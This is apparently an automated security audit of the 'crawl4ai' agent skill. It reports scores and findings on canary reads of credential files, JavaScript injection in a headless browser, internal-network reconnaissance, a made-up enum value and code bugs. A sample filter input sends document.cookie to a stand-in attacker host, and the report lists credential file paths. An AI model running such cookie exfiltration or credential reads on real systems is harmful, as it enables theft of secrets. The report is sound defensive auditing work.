Is codylrn804/crawl4ai safe?

https://github.com/openclaw/skills/tree/main/skills/codylrn804/crawl4ai

Overall score: 79/100 (CAUTION)

The crawl4ai skill is a documentation and utility-script package for a Python web scraping library. It contains no direct prompt injection attempts and no hardcoded malicious endpoints, and the canary files were confirmed intact. However, the skill has significant quality problems (an offensive and fictitious API enum value, BrowserMode.SLAVERY; a missing documented file; and a runtime bug), all consistent with unreviewed AI-generated content. The core capability it teaches and enables, arbitrary JavaScript injection in a headless browser with full network access, creates a meaningful attack surface that a malicious actor controlling the agent's instructions could exploit. Canary file reads observed post-installation are attributed to the monitoring infrastructure rather than to the skill itself.

Category Scores

Prompt Injection 88/100 · 30%
Data Exfiltration 73/100 · 25%
Code Execution 70/100 · 20%
Clone Behavior 87/100 · 10%
Canary Integrity 87/100 · 10%
Behavioral Reasoning 68/100 · 5%
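
The report does not state how the category scores combine into the overall score. A minimal sketch, assuming the percentage after each category is its weight and the overall score is the weighted mean, reproduces the published 79:

```python
# Category scores and weights copied from the list above: (score out of 100, weight).
# Treating the percentages as weights in a weighted mean is an assumption;
# the report does not describe its scoring formula.
CATEGORIES = {
    "Prompt Injection": (88, 0.30),
    "Data Exfiltration": (73, 0.25),
    "Code Execution": (70, 0.20),
    "Clone Behavior": (87, 0.10),
    "Canary Integrity": (87, 0.10),
    "Behavioral Reasoning": (68, 0.05),
}


def weighted_score(categories):
    """Return the weighted mean of the category scores."""
    total_weight = sum(weight for _, weight in categories.values())
    weighted_sum = sum(score * weight for score, weight in categories.values())
    return weighted_sum / total_weight


overall = weighted_score(CATEGORIES)
print(round(overall))  # rounds to the published overall score
```

Under this assumption the weights sum to 100% and the weighted mean is about 79.45, which rounds to 79.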

Findings (7)

HIGH Canary Sensitive Files Read Post-Installation (Ambiguous Attribution) -15

Six canary files containing credentials and secrets (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, .config/gcloud/application_default_credentials.json) were accessed via open/read syscalls at Unix timestamp 1771934028.837, approximately 4 seconds after the skill was installed. An identical set of reads occurred at 1771934006.372, about 22.5 seconds earlier and before the skill was even cloned. This dual pattern (pre-install and post-install reads of identical files) is characteristic of the oathe monitoring system performing baseline canary verification. The canary integrity check confirms no modification. Attribution to skill activity cannot be conclusively ruled out but is considered unlikely given the evidence pattern.
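
The attribution argument above can be sketched as a comparison of the two read batches. This is an illustrative heuristic only, not the monitoring system's actual logic; the `ReadBatch` type and the `looks_like_baseline_sweep` helper are hypothetical names introduced for the example.

```python
from dataclasses import dataclass

# The six canary paths named in the finding.
CANARY_PATHS = frozenset({
    ".env",
    ".ssh/id_rsa",
    ".aws/credentials",
    ".npmrc",
    ".docker/config.json",
    ".config/gcloud/application_default_credentials.json",
})


@dataclass(frozen=True)
class ReadBatch:
    """Hypothetical record of one burst of canary reads."""
    timestamp: float      # Unix time of the batch
    paths: frozenset      # files opened in the batch


# Timestamps taken from the finding.
pre_clone = ReadBatch(timestamp=1771934006.372, paths=CANARY_PATHS)
post_install = ReadBatch(timestamp=1771934028.837, paths=CANARY_PATHS)


def looks_like_baseline_sweep(before: ReadBatch, after: ReadBatch) -> bool:
    """True when a later batch touches exactly the files an earlier one did.

    An identical sweep that already happened before the skill existed on disk
    suggests (but does not prove) that the same external process did both.
    """
    return before.timestamp < after.timestamp and before.paths == after.paths


gap_seconds = post_install.timestamp - pre_clone.timestamp
print(looks_like_baseline_sweep(pre_clone, post_install), round(gap_seconds, 3))
```

A match here supports the monitoring-infrastructure explanation, but per-process attribution of the syscalls would still be needed to rule out the skill conclusively.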

MEDIUM Arbitrary JavaScript Injection in Headless Browser Taught as Core Pattern -20

The skill explicitly documents and promotes arbitrary JavaScript injection via the js_code parameter as a core Advanced Feature. Code examples show executing custom DOM manipulation and data extraction JS, with js_only=True mode to execute JS without downloading resources. An agent instructed to use this skill could inject malicious JavaScript to steal session cookies, CSRF tokens, form data, or access internal browser-accessible resources. The skill frames this as a legitimate, expected usage pattern.
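
One way an agent host might reduce this risk is to screen JavaScript before it is handed to the js_code parameter. The sketch below is a deliberately naive, hypothetical pre-filter (the `flag_js_snippet` name and the pattern list are assumptions, not part of the skill or of crawl4ai); obfuscated code would evade it, so it illustrates the idea and is not a defense on its own.

```python
import re

# Hypothetical patterns for capabilities the finding calls out:
# cookie theft, stored-token access, and sending data to another origin.
SENSITIVE_JS_PATTERNS = {
    "cookie access": re.compile(r"document\s*\.\s*cookie"),
    "web storage access": re.compile(r"\b(?:localStorage|sessionStorage)\b"),
    "outbound request": re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon)\b"),
}


def flag_js_snippet(js_code: str) -> list[str]:
    """Return the labels of every sensitive pattern found in the snippet."""
    return [
        label
        for label, pattern in SENSITIVE_JS_PATTERNS.items()
        if pattern.search(js_code)
    ]


benign = "window.scrollTo(0, document.body.scrollHeight);"
suspicious = "fetch('https://attacker.example/?c=' + document.cookie);"

print(flag_js_snippet(benign))
print(flag_js_snippet(suspicious))
```

A scroll helper passes cleanly, while the second snippet is flagged for both cookie access and an outbound request, which a reviewer or policy layer could then block or escalate.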

MEDIUM Fictitious and Offensive API Enum Value in Documentation -15

The API reference documentation lists BrowserMode.SLAVERY as a valid enum value with the description 'Use scraping ant technology'. This enum value does not exist in the actual crawl4ai open-source library. The offensive name combined with a nonsensical description ('scraping ant technology') strongly indicates AI-generated documentation that was never reviewed by a human author with knowledge of the actual library. This casts doubt on the skill author's credibility and on whether any of the documented API surface is accurate.

LOW Runtime NameError Bug: BrowserMode Not Imported in extract_from_html.py -10

The script extract_from_html.py uses BrowserMode.LATEST in the crawler.arun() call but never imports BrowserMode from crawl4ai. Python raises a NameError as soon as that call is evaluated, so that code path cannot run. The bug indicates the code was generated without execution testing, further corroborating that this is poor-quality AI-generated content.
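
This class of bug can be caught without executing the script. The sketch below uses Python's standard ast module to report names that are read but never bound at any point in the file. The sample source is a hypothetical reconstruction of the pattern described above, not the skill's actual code; in particular the `browser_mode=` keyword is an assumption, and whether crawl4ai exports `BrowserMode` at all is not verified here.

```python
import ast

# Hypothetical reconstruction of the bug pattern. The source is only parsed,
# never imported or executed, so crawl4ai does not need to be installed.
SAMPLE_SOURCE = '''
from crawl4ai import AsyncWebCrawler

async def main(url):
    async with AsyncWebCrawler() as crawler:
        return await crawler.arun(url=url, browser_mode=BrowserMode.LATEST)
'''


def unbound_names(source: str, candidates: set[str]) -> set[str]:
    """Return the candidate names that are read somewhere but never bound.

    Binding is approximated as: imported, assigned, or defined as a function
    or class anywhere in the file. Scoping rules are ignored, so this is a
    coarse lint-style check rather than a full name resolver.
    """
    bound, used = set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            for alias in node.names:
                bound.add((alias.asname or alias.name).split(".")[0])
        elif isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            bound.add(node.name)
        elif isinstance(node, ast.Name):
            if isinstance(node.ctx, ast.Store):
                bound.add(node.id)
            else:
                used.add(node.id)
    return (used & candidates) - bound


print(unbound_names(SAMPLE_SOURCE, {"BrowserMode", "AsyncWebCrawler"}))
```

For the sample, only `BrowserMode` is reported, since `AsyncWebCrawler` is bound by the import. General-purpose linters perform a more complete version of the same check.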

LOW Documented Script File Missing from Package -5

SKILL.md documents clean_html.py as a resource in the scripts/ directory with the description 'HTML cleaning utility', but this file is absent from the installed skill package. The package contains only scrape_single_page.py, scrape_multiple_pages.py, and extract_from_html.py. This suggests the skill was published incomplete or that the documentation was generated for a planned-but-unimplemented file.
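
A packaging check for this kind of gap is straightforward to sketch. The example below compares a list of documented script names against the files actually present in scripts/. The `missing_scripts` helper is a hypothetical name, and the assumption that SKILL.md documents all four scripts (the finding only confirms clean_html.py) is labeled in the code; the demo builds a temporary directory mirroring the package contents described above.

```python
import tempfile
from pathlib import Path

# Assumption: SKILL.md lists all four scripts. The finding only confirms
# that clean_html.py is documented and that the other three are present.
DOCUMENTED_SCRIPTS = [
    "scrape_single_page.py",
    "scrape_multiple_pages.py",
    "extract_from_html.py",
    "clean_html.py",
]


def missing_scripts(skill_dir, documented):
    """Return documented script names that are absent from <skill_dir>/scripts."""
    scripts_dir = Path(skill_dir) / "scripts"
    present = {path.name for path in scripts_dir.glob("*.py")}
    return sorted(set(documented) - present)


# Recreate the installed package layout described in the finding.
with tempfile.TemporaryDirectory() as tmp:
    scripts = Path(tmp) / "scripts"
    scripts.mkdir()
    for name in DOCUMENTED_SCRIPTS[:3]:
        (scripts / name).touch()
    result = missing_scripts(tmp, DOCUMENTED_SCRIPTS)

print(result)
```

Running a check like this at publish time would have flagged clean_html.py before the package shipped.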

LOW Platform Gateway Established New External Connections Post-Install -8

After skill installation, the openclaw-gateway process (pid=1093) opened two new connections in the ESTABLISHED state to 3.213.170.18:443 (AWS EC2, us-east-1 region) that were absent pre-install. These connections are attributable to the ClawHub platform infrastructure reporting audit results, not to the skill itself. However, they represent new persistent external connectivity introduced coincident with installation.

INFO Headless Browser Enables Internal Network Reconnaissance and Data Exfiltration -12

The skill enables full headless browser operation against arbitrary URLs with JavaScript execution, custom headers (user-agent spoofing), session management, and file output. In an agent context where the agent has access to internal network addresses (cloud metadata APIs, admin panels, internal services), this skill could be directed to scrape sensitive internal resources and write results to disk for subsequent exfiltration. This is an inherent risk in any capable web scraping skill, not unique to this implementation.
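
A common mitigation for this risk is to refuse internal targets before a URL ever reaches the crawler. The following is a minimal sketch using only the standard library; `is_internal_target` is a hypothetical helper, not something the skill or crawl4ai provides. It checks literal IP addresses and localhost names only and does not resolve DNS, so a hostname that resolves to a private address would pass and needs a separate resolution-time check.

```python
import ipaddress
from urllib.parse import urlsplit


def is_internal_target(url: str) -> bool:
    """Return True when the URL's host is a literal internal address.

    Covers loopback, RFC 1918 private ranges, link-local addresses (which
    include the 169.254.169.254 cloud metadata endpoint), and reserved
    ranges. URLs with no parseable host are treated as unsafe.
    """
    host = urlsplit(url).hostname
    if host is None:
        return True
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: not resolved in this sketch, so not flagged here.
        return False
    return (
        address.is_private
        or address.is_loopback
        or address.is_link_local
        or address.is_reserved
    )


for candidate in (
    "http://169.254.169.254/latest/meta-data/",
    "http://10.0.0.5/admin",
    "https://example.com/",
):
    print(candidate, is_internal_target(candidate))
```

An agent host could call such a guard on every URL it passes to a scraping skill and reject or escalate anything flagged as internal.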